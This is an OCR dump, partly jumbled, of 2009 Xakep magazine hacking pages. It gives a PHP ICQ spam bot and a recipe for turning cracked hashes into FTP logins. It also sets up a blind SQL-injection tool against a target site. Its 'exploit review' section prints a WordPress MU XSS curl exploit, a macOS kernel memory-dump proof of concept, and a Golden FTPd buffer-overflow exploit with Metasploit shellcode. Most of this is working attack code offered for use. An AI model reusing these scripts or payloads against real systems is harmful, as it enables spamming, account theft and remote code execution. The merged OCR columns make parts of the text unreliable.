Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
Скачиваний:
12
Добавлен:
20.04.2024
Размер:
14.76 Mб
Скачать

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

>>m

 

w Click

to

 

 

 

 

взлом

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

¹6

ЗАДАЧА: НАПИСАТЬICQ-СПАМЕРНАPHP РЕШЕНИЕ:

ICQ-спамстановитсявсеболееактуальным. Этосложнонезаметить, особенно, еслитебевасюежедневноприлетаетсдесятоксообщений рекламногохарактера. Большинствокачественныхпродуктовдляподобныхрассылокстоитденег, поэтомувозникаетвопрос: аненаписать липростенькуюспамилкусобственноручно? Например, навсеминами любимомPHP. Думаешь, нереально? Ошибаешься, исейчасятебеэто докажу:

1.Всвоихначинанияхмыбудемиспользоватьспециальныйкласс WebIcqLite.class.php, которыйтысможешьнайтинанашемDVD.

2.Дляуспешногоиспользованиявсехфункцийклассаследуетприинклудитьоныйвнашемскрипте—

include('WebIcqLite.class.php');

3.Вобщемвиде, вкачествепримерарассмотримскриптотPashkela:

<?php @set_time_limit(0);

@ini_set("display_errors","1"); ignore_user_abort(1); include('WebIcqLite.class.php'); $ini = parse_ini_file("icq.ini");

$uin = $ini[uin];

// UIN äëÿ áîòà

$pass = $ini[pass];

// Пароль для UIN бота

$file_uin = $ini[file_uin];

// Файл, где список рассылки

$message = $ini[message];

// Сообщение

$pause = $ini[pause];

 

// пауза между сообщениями

define('UIN', $uin);

 

 

define('PASSWORD', $pass); $icq = new WebIcqLite();

if(!$icq->connect(UIN, PASSWORD)) {

¹5

ЗАДАЧА: ОТПАРСИТЬДАННЫЕИЗPASSWORDPRO ДЛЯИСПОЛЬЗО- ВАНИЯВFTP-ЧЕКЕРЕ

РЕШЕНИЕ:

Длябрутасамыхразнообразныххешейчастоприходитсяиспользовать популярнуюутилуPasswordPro. Прогадовольноудобнаиотменноработает назабугорныхломанныхдедиках:). Проблемалишьвтом, чтокаждыйраз парситьвручнуюрезультатыбрута— утомительно. Представь, чтотынашел SQL-инъекциюнакрупномпортале, слилименаихешиMySQL-юзеров

иотправилихнабрутвPasswordPro. Брутерсзадачейсправился, пассы найдены, ибылобынеплохопопробоватьихнаFTP. Воттутипоявляется многолишнейработы, аименно— преобразованиесбрученныхданных изPasswordPro вида«admin:5ba686200919b19f:narym7» встандартный форматфтп-чекероввида«ftp://admin:narym7@127.0.0.1». Итак, поехали: 1. Первое, чтонамнужносделать, — слитьужеготовыйпарсер«Small parser for passwordpro» отevil_packman’аснашегоDVD :). 2. Теперьэкс-

портируемужесбрученныеаккиизPasswordPro вфайлfirst.txt, например:

admin:5ba686200919b19f:narym7

news:5ba686200919b19f:wens6

root:5ba686200919b19f:sawbdv

swin:5ba686200919b19f:zasut4

ICQ-спамернаPHP своимируками

echo $icq->error; exit();

}

$file = fopen($file_uin,'r'); while (!feof($file)) {

$buffer = trim(fgets($file)); $icq->send_message($buffer, $message); echo «Message sent to $buffer \n»; flush();

sleep($pause);

}

$icq->disconnect(); exit();

?>

4.Вфайлеicq.ini располагаютсяданныепоуинам:

uin = 123456 ; UIN, с которого рассылаем

pass = 1234 ; Пароль для UIN, с которого рассылаем file_uin = uin.txt ; Файл со списком UIN для рассылки message = test, do not reply this message, bot-test ; Собственно, сама мессага для отсылки

pause = 2 ; Пауза между каждым сообщением, чтобы нас не забанили (в секундах)

5.Авфайлеuin.txt лежитсписокуинов, покоторымбудетпроводиться рассылка.

Каквидишь, вседостаточнопросто. Тебеостаетсялишьизменитьсорец насвоеусмотрениелибонакодитьновый:).

web:5ba686200919b19f:nfgavr

2.Вспоминаем, установленлиунасPHP. Еслинет— срочноидемнаГугл икачаем(ещепригодится:)).

3.Созданныйранеефайлfirst.txt (саккамиизбрутера) кладемводной директорииспарсером.

4.Запускаемскрипт:

C:\php\php C:\parser.php first.txt out.txt 127.0.0.1,

— гдеfirst.txt — файлсданнымиизPasswordPro, out.txt — файлсотпар-

сеннымиаккаунтами, а127.0.0.1 — IP ftp-сервера.

5.Навыходерядомспарсеромобнаруживаемфайлout.txt сcодержимым:

ПарсимданныеизPasswordPro

040

XÀÊÅÐ 04 /124/ 09

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

>>

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

взломw

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

o

m

 

w

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

ftp://admin:narym7@127.0.0.1

 

ftp://web:nfgavr@127.0.0.1

ftp://news:wens6@127.0.0.1

 

 

 

Все, теперьберемлюбойфункциональныйфтп-чекерипроверяем

ftp://root:sawbdv@127.0.0.1

 

ftp://swin:zasut4@127.0.0.1

 

аккаунтыкFTP.

 

 

 

¹7

 

 

 

 

 

нами таблиц

 

 

 

 

• dic/grey_field_name.txt — дефолтовый словарь с именами

 

 

колонок

 

 

ЗАДАЧА: АЛЬТЕРНАТИВНЫМСПОСОБОМУЗНАТЬОСНАСЕТЕВОМ

 

 

 

3. Заливаемвсевышеперечисленныефайлынанаш(илинесовсем

УРОВНЕ

наш) хост.

РЕШЕНИЕ:

4.Выставляемчмодназаписьдлякаталога, вкоторомнаходятсяскрип-

Кактыужезнаешь, Blind SQL-Injections представляютсобойслепые

тыconfig.php иmain.php.

SQL-инъекции, работаскоторымимаксимальнозатруднена. Есликонк-

5. Отредактируемconfig.php. Особоевниманиенадоуделитьосновным

ретнее, тораскручиватьподобныебагиручками— делонеблагодарное.

параметрам:

Поэтому, идеяавтоматизациипроцессавозникладавноибылауспешно

 

 

 

реализованавнесколькихпроектах, однимизкоторыхмыивоспользу-

$host = ''; // Адрес сайта

емся. ИспользоватьбудемскриптоттоварищаGrey’я, ибоутиласпеци-

$port = ; // Ïîðò

альнозаточенаподработусослепымискул-инъектамиимускулом. Из

$path = ''; // Путь до уязвимого скрипта (начиная с ‘/’)

полезныхфичскриптаследуетотметить:

$vars = ""; // Переменные (или содержимое КУКОВ, если

 

 

sql-инъекция в КУКАХ): вначале неуязвимые переменные с

• Вывод стандартной информации: version(), user(),

 

 

их значениями,

database(), при mysql >= 3 версии.

 

// а затем, в конце, уязвимая переменная, вместе с су-

• Подбор имен таблиц по встроенной базе имен либо по ука-

 

ществующим значением, МОЖЕШЬ указать кавычку, если она

занному словарю, при mysql >= 4.1 версии.

 

нужна

 

 

• Подбор названий колонок к указанной таблице по встро-

 

$strend = ''; // Символ комментария ('--+', '/*', '#'),

енной базе имен колонок либо по указанному словарику, при

 

если нужен

 

 

mysql >= 4.1 версии.

 

$method = ; // (цифра): метод отправки данных

• Вывод результата указанного запроса, при mysql >= 4.1

 

// 0 — POST; инъекция в переменной типа POST

версии.

 

// 1 — GET; инъекция в переменной типа GET

• Вывод содержимого указанного файла, при наличии соот-

 

// 2 — GET/COOKIE; инъекция в COOKIE

ветствующих прав в mysql >= 3 версии.

 

$type = ; // (0 или 1): тип распознания правильности вы-

• Определение длины результата указанного запроса, осо-

 

полнения sql-запроса:

бенно полезно при выводе части содержимого какого-либо

 

// 0 — правильность запроса определяется по наличию

файла, работает в mysql >= 4.1 версии.

 

текста, который должен появляться только при указанном

• Определение имен таблиц и имен БД, в которых они нахо-

 

значении уязвимой переменной

дятся с помощью information_schema.tables в mysql => 5

 

// 1 — правильность запроса определяется по отсутствию

версии.

 

текста (текста ошибки), которая должна появляться при

• Определение имен колонок к указанной таблице, нахо-

 

неправильном выполнении запроса

дящейся в указанной БД, с помощью information_schema.

 

$text = ‘’; // Текст, по которому будет определяться пра-

columns в mysql => 5 версии.

 

вильность выполнения запроса

• Сопоставление имен таблиц и имен БД, в которых они на-

 

 

 

 

 

6. Перейдивбраузереполинкуhttp://хост/каталог/main.php.

ходятся с помощью information_schema.tables в mysql => 5

 

версии.

 

7.Ждем30 секунду, приотсутствиикаких-либоошибок— закрываем

• Поиск данных в файлах; по дефолту из файлов выделяются

 

браузеринадеемсяналучшее.

такие данные, как:

 

8.Черезнесколькочасовсмотримрезультатвфайлеresult.txt.

• переменные, которые могут содержать пароль;

 

Кстати! Помни, чтовремяработыскриптанапрямуюзависитотширины

• переменные, которые могут содержать данные для подклю-

 

каналатвоегосервера, атакжеотнагрузкинаатакуемуюСУБД. z

чения к СУБД.

 

 

 

 

 

КонфигурируеминструментдляработысBlind SQL-Injections

 

 

• Вывод стандартной информации в PostgreSQL: version(),

 

 

 

 

 

 

current_user(), current_database().

 

 

 

 

• Подбор имен таблиц в PostgreSQL.

 

 

 

 

 

 

 

 

 

Теперьрассмотрималгоритмдействийпоустановке, настройкеизапускуутилы:

1.СливаемархивстулзойснашегоDVD.

2.Распаковываемархив, проверяемсодержимое:

main.php — сам скрипт

config.php — файл с настройками скрипта

lib_and_data/grey_data.php — стандартный словарик с именами таблиц и колонок

lib_and_data/function.php — библиотека функций для работы со слепыми sql-инъекциями

dic/grey_table_name.txt — стандартный словарик с име-

XÀÊÅÐ 04 /124/ 09

041

 

 

 

 

 

 

hang

e

 

 

 

 

 

X

C

 

E

 

 

-

 

 

 

 

 

 

d

 

F

 

 

 

 

 

 

 

t

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

w Click

 

 

BUY

>>m

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

.

 

 

 

 

 

 

.c

 

 

p

 

 

 

 

 

g

 

 

 

 

d

f

 

 

n

e

 

 

 

 

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

взлом

обзор

обзор

эксплоитов

эксплоитов

обзор

эксплоитов

обзор

эксплоитов

обзор

эксплоитов

АНДРЕЙ «SKVOZ» КОМАРОВ

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

 

 

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

 

 

 

 

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

обзор

 

 

 

 

 

обзор

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

эксплоитов

 

 

 

 

 

эксплоитов

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

01 МЕЖСАЙТОВЫЙ СКРИПТИНГ

ВWORDPRESS MU

>> Brief

Wordpress MU — версияизвестногоблогосферногопродукта, предназначенногодляорганизациибесчисленногочислаблоговнаодном движке(атакже— наодномсервере). Уязвимостьбыланайденавфунк-

цииchoose_primary_blog (всоставеwp-includes/wpmu-functions.php).

Рассмотримкодсеготворения.

1830 function choose_primary_blog() {

1831

global $current_user;

 

1832

?>

 

1833

<table class=»form-table»>

 

1834

<tr>

 

1835

<th scope=»row»><?php _e(‘Primary Blog’); ?></th>

 

1836

<td>

 

1837

<?php

 

Процессфаззинга

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

обзор

обзор

 

 

эксплоитов

эксплоитов

 

1838 $all_blogs = get_blogs_of_user( $current_ user->ID );

1839 if( count( $all_blogs ) > 1 ) {

 

...

1848

} else {

1849

echo $_SERVER[‘HTTP_HOST’];

1850

}

1851

?>

1852

</td>

1853

</tr>

1854

</table>

1855

<?php

1856 }

 

Пристальновзглянувна1849 строку, понимаем, чтовнашзапросксерверу можновнедритьчто-нибудьвредоносное— например, стороннийHTML/ JS-код. ВоссоздатьтакуюситуациюреальноспомощьюHTTP-анализато- ровсвозможностьюобратногоинжектапакета, либожеWEB-проксейдля проверкинабезопасностьприложений(WebScarab, Burpsuite).

042

XÀÊÅÐ 04 /124/ 09

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

обзор

обзор

эксплоитов

эксплоитов

>>

обзор

эксплоитов

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

взломw

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

o

m

 

w

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

>>Targets:

Wordpress MU < 2.7

>>Exploit

$ curl -H "Cookie: " -H «Host: <body onload=alert(String.fromCharCode(88,83,83))>" http://www.example.com/wp-admin/profile.php> tmp.html $ firefox tmp.html

>> Solution

Производительужеуведомленоналичиибреши, нореакциипоканена-

блюдается(читай одноименную статью в нашей рубрике и поймешь, что WordPress славится далеко не единой брешью, — Прим. Forb).

APPLE MACOS X XNU <= 1228.X LOCAL KERNEL MEMORY

DISCLOSURE

>> Brief

МножественныецелочисленныепереполнениявфункцияхApple MacOS позволяютспомощьюспециальногосистемноговызоваi386_set_ldt или i386_get_ldt повыситьпривилегиилокальныхпользователей. Нетрудно сделатьвывод, чтоуязвимостьможетбытьэксплуатированнойисклю- чительнонаIntel-based машинах. Невдаваясьвподробности, скажу, что подобногородауязвимостьбылаобнаруженаажв2005 годувоFreeBSD (инечемутутудивляться, ведьUnix-архитектураобеихсистемконсер- вативна). Такойжебагбылнайденисравнительнонедавно, ноужев MacOS. Напомню, чтосуществуеттривидатаблицдескрипторов: глобальнаятаблица(однавсистеме— GDT), локальнаятаблица(можетбыть своядлякаждойзадачи), атакжетаблицадескрипторовпрерываний. Локальнаятаблица(LDT) содержиттолькодескрипторысегментов, шлюзовзадачиивызовов. Сегментнедоступензадаче, еслиегодескриптора нетнивLDT, нивGDT (потомучтолокальнаядескрипторнаятаблица описываетсядескрипторомглобальнойтаблицы). Основавиртуальной памятисистемыPentium состоитиздвухтаблиц: LDT иGDT.

Функцияi386_get_ldt возвращаетсписокдескрипторов, задействованныхвLDT (Local Descriptor Table) втекущиймомент. Базовыйсинтаксис вызоваописываетсяследующейфункцией:

#include <machine/segments.h> #include <machine/sysarch.h>

int i386_get_ldt (int start_sel, union descriptor *descs, int num_sels);

Сообщивпараметрэкстремальнобольшогоразмера, можнодопустить копированиепамятиядравпользовательскоеокружение.

>> Targets

Apple Mac OS X <10.5.6

>> Exploit http://milw0rm.com/exploits/8108

Ключевыефрагментыпривожуниже:

#define TMP_FILE "/tmp/xnu-get_ldt" #define READ_SIZE 0x2000000

int

main (int argc, char **argv)

{

int fd, n, num_desc; void *ptr;

n = i386_get_ldt (0, ((int)NULL) + 1, 0);

if (n < 0)

{

fprintf (stderr, "failed i386_get_ldt(): %d\n", n); return (EXIT_FAILURE);

}

num_desc = n;

printf ("i386_get_ldt: num_desc: %d\n", num_desc);

fd = open (

TMP_FILE, O_CREAT | O_RDWR, S_IRUSR | S_IWUSR); if (fd < 0)

{

fprintf (stderr, "failed open(): %d\n", fd); return (EXIT_FAILURE);

}

//mmap проецирует файлы или память устройств в память ptr = mmap (NULL, READ_SIZE, PROT_READ | PROT_WRITE,

MAP_ANON | MAP_PRIVATE, -1, 0); if ((int) ptr == -1)

{

fprintf (stderr, "failed mmap()\n"); return (EXIT_FAILURE);

}

//задание значения участку памяти, в данном случае — зануление READ_SIZE байт по адресу в ptr

memset (ptr, 0x00, READ_SIZE); i386_get_ldt (num_desc — 1,

(union ldt_entry *) ptr, -(num_desc — 1));

//дампим участок памяти в файл

n = write (fd, ptr, READ_SIZE); munmap (ptr, READ_SIZE); close (fd);

printf ("%d-bytes of kernel memory dumped to: %s\n", n, TMP_FILE);

return (EXIT_SUCCESS);

}

>> Solution

Сейчаскакразидетактивноеобсуждениерешения.

02 FULL DISCLOSURE

МНОГОЧИСЛЕННЫЕУЯЗВИМОСТИВ FTP-СЕРВЕРАХ.

>> Brief

Однаизсамыхраспространенныхпроблембезопасностибудетотраженавэтойзаметке, аименно— fuzzing FTP-серверов. Сампроцесс

Вместоwin32_exec payload’a мымоглибывыбратьчто-нибудьболее опасное, например, организациюудаленногошелла

XÀÊÅÐ 04 /124/ 09

043

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

X

C

 

E

 

 

 

-

 

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

>>m

 

 

 

 

 

 

to

 

 

 

взлом

w Click

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

 

g

 

 

 

 

 

d

f

 

 

n

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

обзор

обзор

эксплоитов

эксплоитов

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

обзор

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

m

 

w Click

 

 

 

 

 

 

эксплоитов

 

 

 

 

 

o

 

 

 

w

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-x cha

 

 

 

 

обзор

эксплоитов

Эксплуатацияуязвимостипривелакисполнениюcalc.exe безведома пользователя

фаззинганеразужеописывалсянастраницахжурнала: посути, это умышленноеобщениессервисомспомощьюаномальныхзапросов. Вспомним, чтонасамомделеFTP-протоколоченьемокинасчитывает болеестакоманд. Соответственно, разработчикидолжныучестьихвсе всвоихприложениях(аэтооченьтрудоемкаязадача) — устанавливать ограничениенавводимуюдлинусоздаваемойпапки, контролируемую глубинупутиитакдалее. Дляавтоматизациипроцессабагоискатели пишутлибособственныескрипты, либополноценныеприложения,

вродеInfigo FTP Fuzz (infigo.hr/files/ftpfuzz.zip). Какправило, подобно-

городауязвимостиэксплуатируютсяпослеавторизации. Дляэтого можнозаюзатьanonymous-доступ, из-подкоторогоиосуществлять проверки. Сюжетпрост— фаззеромсообщаютсяразличныеданные, апараллельномыосуществляеммониторингповеденияприложения (OllyDbg). Поройприложениенедаетсебядебажитьиконфликтуетс «Olly». Чтобырешитьпроблему, попробуйиспользоватьальтернатив-

ныйотладчик. FaultMon (research.eeye.com/html/tools/RT20060801-4. html) — утилитадлявыявленияэкспешноввприложениииихкорректнойработы.

ДляаттачапроцессавOllyDbg можновоспользоватьсясоответствую- щейвкладкойилииспользоватьфлаг-P (суказаниемPID процесса). АналогичныйфлагприсутствуетивFaultMon. Рассмотримпроцесс анализаGolden FTPd. Аттачимпроцесскдебаггеруиначинаемфаззингповсемпараметрам. Таккаксервиспривязанкзапуску«внутри» Olly, дляболеекачественнойотладкипослекрешапредстоитиграться сDebug > Restart. Из-запереполнениявходныхданныхпокоманде USER мывыявилипереполнениебуфера, изначениеEIP перезаписа-

лосьна41414141.

Путемзамероввыясняем, чтопереполнилибуфер3000 байтами. Далее требуетсяпередатьуправлениенашелл-кодпутемизмененияадреса возврата. КликаемправойкнопкоймышивокнеOllyDbg: Overflow Return Address ÆASCII Overflow returns ÆSearch JMP/Call ESP. Когда этапроцедуразавершена, палимView ÆLog, чтобыотследитьрасположение«jmp esp», «call esp» впроцессеисвязанныхDLL.

ТеперьViewÆExecutable Modules — ипобазеOpCodeDB вMetasploit определяемадресвозврата: 0x750362c3 — ws2_32.dll (opcode — pop,pop.ret). Обнаружили, чтоданныйадрессодержитpop,pop.ret. Таккаконинужнынам, прибавляемединицукадресувозврата, чтобы пропуститьоднуизкомандpop (0x750362c4).

Мыможемвоспользоватьсяготовымшелл-кодомwin32_exec изпаке-

таMetasploit (payloads):

"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"

"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"

"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"

"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"

"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"

ПереполнениебуферапривелокперезаписирегистраEIP

"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"

"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"

"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0"

"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c"

"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b"

"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4"

#(3000 bytes) sc = 'A' * 3000

#calc.exe Shellcode(172 bytes)

sc += "\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8" sc += "\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1" sc += "\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07" sc += "\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25" sc += "\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5" sc += "\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d" sc += "\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4" sc += "\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0" sc += "\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c" sc += "\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b" sc += "\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4"

#Windows 2000 SP0,1,2,3,4 (pop,pop,ret+1)= (pop,ret)

#Thanks Metasploit!

return_address='\xC5\x2A\x02\x75’

buffer = '\xEB\x30' + ' /' + sc + return_address + '\r\n\r\n' print buffer

Эксплойтготов! Послеегозапускаиотправкисоответствующего содержимогомыполучимудаленноеисполнениеcalc.exe нацелевой машине.

